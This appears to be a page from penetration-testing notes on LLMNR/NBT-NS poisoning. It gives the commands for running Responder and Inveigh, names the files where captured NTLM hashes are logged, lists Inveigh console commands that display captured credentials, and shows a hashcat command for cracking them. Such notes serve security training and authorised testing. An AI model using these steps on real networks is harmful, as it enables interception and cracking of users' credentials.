LLMNR, NBT-NS Poisoning

ABOUT

Imagine a situation: you need to connect to some local domain, website, or SMB share. You misclicked one letter and instead of some \\mil-stash share you wrote \\mel-stash and first request goes to DNS server, but it doesn't know who the hell is \\mel-stash, so it sending a broadcast request (works same as ARP, just where ARP connects MAC to IP, LMMNR connects names to IP's). And that's the place where we come in with Responder (UNIX) or Inveigh (Windows) to poison these requests and to make target think that our IP is the right one. It tries to authenticate and sends hash which we can crack with Hashcat.

RESPONDER

MOSTLY LINUX TOOL (BUT THERE IS WIN VERSION)

Overview

Responder is a powerful tool used for LLMNR/NBT-NS poisoning, capable of capturing NTLMv1/NTLMv2 hashes from network traffic. It can operate in both Analysis (passive) mode and Poisoning (active) mode.

Running Responder

To display available options, use:

responder -h

To start Responder with default settings:

sudo responder -I ens451

Common Flags

  • -A : Analyze mode (passive monitoring without responding)

  • -I <interface> : Specify network interface

  • -w : Start WPAD rogue proxy server

Capturing Hashes

Responder listens for authentication requests and captures NTLM hashes when a target attempts to authenticate. These hashes are saved in:

/usr/share/responder/logs

Hashes are stored in the format:

(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

Example captured log files:

SMB-NTLMv2-SSP-13.13.13.13.txt
HTTP-NTLMv2-13.13.13.13.txt

Cracking NTLMv2 Hashes with Hashcat

hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt

INVEIGH

WINDOWS TOOL

Overview

Inveigh is a PowerShell/C# tool similar to Responder, used for LLMNR, NBNS, and SMB relay attacks on Windows networks.

Running Inveigh (PowerShell Version)

Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Key Features:

  • Captures NTLM hashes via LLMNR/NBT-NS spoofing

  • Supports multiple protocols (DNS, mDNS, SMB, HTTP, LDAP, WebDAV)

  • Can output logs to a file (C:\Tools directory)

Running Inveigh (C# Version)

The C# version (Inveigh.exe) is more stable and is the recommended option.

.\Inveigh.exe

Default enabled options:

  • LLMNR & NBNS Spoofing

  • HTTP/HTTPS Authentication Capture (NTLM)

  • SMB & LDAP Listening

Interacting with Inveigh

While running Inveigh, press ESC to open the interactive console.

Useful Commands:

GET NTLMV2UNIQUE     # Display unique NTLMv2 hashes
GET NTLMV2USERNAMES  # Display captured usernames and IPs
GET CLEARTEXT        # Display captured cleartext credentials
STOP                 # Stop Inveigh

Cracking NTLMv2 Hashes with Hashcat

hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
PreviousMITM / Coerced AuthsNextPetitPotam